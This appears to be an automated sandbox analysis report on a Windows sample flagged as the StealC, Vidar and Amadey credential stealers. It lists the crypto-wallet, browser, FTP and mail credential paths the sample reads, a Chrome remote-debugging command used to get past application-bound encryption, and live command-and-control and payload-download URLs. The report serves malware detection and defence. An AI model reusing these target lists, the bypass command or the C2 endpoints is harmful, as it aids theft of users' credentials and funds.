Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2547238777.0000000000DB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2547238777.0000000000DE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2547238777.0000000000DE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: MultiDoge
Source: file.exe, 00000000.00000002.2547238777.0000000000DE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: seed.seco
Source: file.exe, 00000000.00000002.2547238777.0000000000DB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2547238777.0000000000DB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 4276, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"

Yara detected Stealc

Source: Yara match	File source: 0000001D.00000003.3027537351.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2992599240.000000000167B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2047136566.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2546281725.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2990514987.0000000000C81000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2947123671.0000000005430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2849080030.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3071062804.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2547238777.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2800396250.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2849516571.0000000000C81000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3069907329.0000000000C81000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6fc7e371fe.exe PID: 7988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6fc7e371fe.exe PID: 9188, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6fc7e371fe.exe PID: 2408, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 4276, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C830C40 sqlite3_bind_zeroblob,	0_2_6C830C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C830D60 sqlite3_bind_parameter_name,	0_2_6C830D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C758EA0 sqlite3_clear_bindings,	0_2_6C758EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C830B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C830B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C756410 bind,WSAGetLastError,	0_2_6C756410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C756070 PR_Listen,	0_2_6C756070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6C75C050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75C030 sqlite3_bind_parameter_count,	0_2_6C75C030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7560B0 listen,WSAGetLastError,	0_2_6C7560B0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_0018EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,	23_2_0018EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_0018DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,	23_2_0018DF51

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
13.107.246.45	s-part-0017.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.185.100	www.google.com	United States	15169	GOOGLEUS	false
18.244.18.27	sb.scorecardresearch.com	United States	16509	AMAZON-02US	false
142.250.181.238	plus.l.google.com	United States	15169	GOOGLEUS	false
104.40.82.182	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
13.107.246.57	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.221.22.212	unknown	United States	20940	AKAMAI-ASN1EU	false
94.245.104.56	ssl.bingadsedgeextension-prod-europe.azurewebsites.net	United Kingdom	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
18.244.18.38	unknown	United States	16509	AMAZON-02US	false
216.58.206.46	play.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
142.250.186.65	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.5
127.0.0.1

Contacted Domains

Name	IP	Active
bg.microsoft.map.fastly.net	199.232.210.172	true
chrome.cloudflare-dns.com	172.64.41.3	true
plus.l.google.com	142.250.181.238	true
play.google.com	216.58.206.46	true
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true
sb.scorecardresearch.com	18.244.18.27	true
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true
www.google.com	142.250.185.100	true
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.57.18	true
googlehosted.l.googleusercontent.com	142.250.186.65	true
sni1gl.wpc.nucdn.net	152.199.21.175	true
assets.msn.com	unknown	unknown
r.msftstatic.com	unknown	unknown
15.164.165.52.in-addr.arpa	unknown	unknown
c.msn.com	unknown	unknown
ntp.msn.com	unknown	unknown
clients2.googleusercontent.com	unknown	unknown
bzib.nelreports.net	unknown	unknown
apis.google.com	unknown	unknown
api.msn.com	unknown	unknown
browser.events.data.msn.com	unknown	unknown

Contacted URLs

Name	Malicious	Reputation
http://185.215.113.206/	false	high
https://sb.scorecardresearch.com/b2?rn=1731389013838&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=39559DFC669A689A222688C967CD69C0&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false	high
http://185.215.113.206/68b591d6548ec281/nss3.dll	false	high
185.215.113.206/c4becf79229cb002.php	false	high
https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0	false	high
http://185.215.113.206/68b591d6548ec281/vcruntime140.dll	false	high
http://185.215.113.206/68b591d6548ec281/sqlite3.dll	false	high
http://185.215.113.206/68b591d6548ec281/mozglue.dll	false	high
http://185.215.113.16/steam/random.exe	false	high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false	high

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.206/68b591d6548ec281/mozglue.dllE8	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/ViewSizePreferences.SourceAumid1	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/sqlite3.dllK8	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpvh	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/ockedCacheCounterMutex	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exe1395d7f	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/off/random.exe0	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.phpY	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/l	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php003	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpb	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/mine/random.exe78	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.php/s	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpq	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpx	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpncodedh	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpbh	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php7001	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exeW	Avira URL Cloud: Label: phishing
Source: http://185.215.113.43/Zu7JuNko/index.php.	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/urrentVersion	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpp#Xl	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/$	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpcoded;	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php.h	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000016.00000002.2646374094.0000000000161000.00000040.00000001.01000000.0000000E.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: file.exe.4276.0.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Multi AV Scanner detection for submitted file

Source: file.exe

Virustotal: Detection: 51%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C656C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C656C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7AA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C7AA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7A4440 PK11_PrivDecrypt,	0_2_6C7A4440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C774420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C774420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7A44C0 PK11_PubEncrypt,	0_2_6C7A44C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6C7F25B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C788670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6C788670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7AA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6C7AA650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6C78E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6C7CA730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6C7D0180

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:54650 version: TLS 1.0

